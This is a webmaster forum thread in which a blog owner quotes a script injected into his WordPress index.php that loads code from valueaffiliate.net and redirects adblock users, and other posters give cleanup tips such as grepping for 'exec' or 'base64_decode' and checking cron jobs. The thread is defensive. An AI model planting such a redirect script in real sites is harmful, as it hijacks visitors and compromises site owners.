![]() |
PHP Injection?!?! http://valueaffiliate.net/abp
I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp
It appears that this is some kind of cloaking injection on the index.php: <script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript> Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated! Telly |
ugh my antivirus just blocked this
|
You using WordPress?
|
Quote:
|
Quote:
or hit me up if you need help. |
Quote:
|
I'd like to kill the fuckin assholes that do this type of shit.
|
Quote:
|
do a search for things like 'exec' or 'base64_decode'
ie grep -r 'exec' ./ in ur root dir. anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing. |
a while back I had an infection and the bastards made a chron job on my server that kept reinstalling it every day. So check your chron jobs too.
|
You may also need to clear any cache folders, like supercache, etc..
|
problem is how you got hacked, is it host, is it ftp, is it script...
|
Quote:
for example... cd to blog root directory then find . | xargs grep 'exec' |
shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server.
this is why i always have a decicated and im the only one with access so that way if something happens i can only blame myself. |
All times are GMT -7. The time now is 03:55 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc